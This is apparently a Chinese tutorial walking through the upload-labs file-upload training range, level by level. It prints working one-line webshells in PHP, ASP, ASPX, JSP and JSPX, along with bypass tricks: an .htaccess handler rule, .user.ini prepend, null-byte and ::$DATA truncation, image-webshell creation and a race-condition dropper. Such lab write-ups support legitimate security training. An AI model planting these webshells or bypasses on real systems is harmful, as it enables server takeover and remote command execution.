2026最详细upload-labs靶场通关教程

前置知识

webshell

以网页形式存在的代码执行环境。用于内容管理（网站、服务器、权限管理等）

有asp、jsp、php、aspx、jspx的动态脚本语言

//php

<?php @eval($_POST['cmd']);?>

//asp

<%eval request("cmd")%>

//aspx

<%@Page Language="Jscript"%><eval(Request.Item["cmd"],"unsafe");%>

//jsp

<%
if(request.getParameter("cmd")!=null){
new ProcessBuilder(request.getParameter("cmd")).redirectErrorStream(true).start().waitFor();
}
%>

//jspx

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:scriptlet>
if(request.getParameter("cmd")!=null){
Runtime.getRuntime().exec(request.getParameter("cmd"));
}
</jsp:scriptlet>
</jsp:root>

原理

web应用程序的文件上传的功能点。（如头像上传，修改上传，文件编辑器中文件上传，图片上传、媒体上传等）没有对用户提交的数据/类型进行严格校验，导致攻击者构造了包含恶意代码的文件成功上传

危害

攻击者操作后台。随意的看后台敏感文件，修改等

防御方式

1 在网站上传文件模块做好认证

2 校验文件类型，不允许脚本语言上传

3 设置白名单。只允许jpg、png等类文件上传

4 上传文件自动设置后缀格式

upload-labs

pass01--前端js绕过

删代码/禁用js代码

写入php的一句话木马之后上传

删掉前端代码

还有onsubmit的索引checkfile的函数。然后再次上传

禁用js代码执行

pass02--mime类型校验

意思就是content-type这个东西

修改一下

上传到了上一层路径下的upload/aaa.php。这一层是pass02.上一层就是upload-labs

所以拼接一下，测试通过了

pass03--检拓展名绕过

改一下配置（配置不当）。意思是php3、php5的后缀按php处理

抓包上传，改后缀为php3

pass04--.htaccess绕过

看源码没过滤.htaccess

.htaccess文件作用是在.htaccess同目录的文件，解析规则按.htaccess来

编辑文件：意思是遇到aaa.jpeg文件按php代码来执行

<FilesMatch "aaa.jpeg">
SetHandler application/x-httpd-php
</FilesMatch>

进行修改后缀，然后上传

. .绕过

pass05--user.ini绕过

user.ini是一个配置文件。作用于文件的目录及其子目录。

编辑user.ini文件。意思是在网站执行每一个ph'p文件，前边都要先执行aaa.jpeg(相当于嵌入代码)

auto_prepend_file=aaa.jpeg

然后进行上传jpeg木马文件

pass06--大小写绕过

构造后缀为.Php

pass07--空格过滤

pass08--点绕过

pass09--::$data流绕过

::data是windows的一个特性。比如1.txt是文件，那1.txt::data就是文件的附属数据流。包含元数据、标签等等信息。

抓包修改包信息aaa.php::$data。然后把::$data删掉进行链接

pass10--.空格.绕过

pass11--双写绕过

pass12--%00绕过get

windows在目录识别的时候，识别到0x00就会认定是字符串结束。从后往前读，读到及结束。

aaa.php0x00这样就会读到aaa.php

利用条件：

php版本<5.3.

保存位置可控

php.ini中的magic_quotes_gpc为off

然后复制图像链接，把php后边的删掉

pass13--%00绕过post方式

0x00是%00的16进制

修改之后放包还是把php后边的东西删掉

然后链接

copy p.jpg/b+aaa.php/a t.jpg

pass14--图片马+文件包含

制作图片马

copy p.jpg/b+aaa.php/a t.jpg

pass15--图片马+文件包含

同14的方法

pass16--图片马+文件包含

同14方法

pass17--二次渲染+文件包含

先上传一张图片，然后下载下来，用工具打开对比不同的地方。然后把恶意代码放进去没有变化的位置。然后用文件包含漏洞包含就可以了

还有一种是用写的脚本（需要可以联系我）。在网站根目录生成一张图

进行包含并且修改post方式

pass18

同17关一样

pass19--条件竞争

准备木马文件

<?php
file_put_contents("aaa.php","<?php phpinfo();?>")
?>

bp抓上传的包，抓到之后放到intruder。开始爆破，进行反复上传

期间反复请求父木马文件。会有间隙生成子木马文件aaa.php

pass20--特殊符号

windows下构造php\.,linux构造php/.

pass21--数组后缀绕过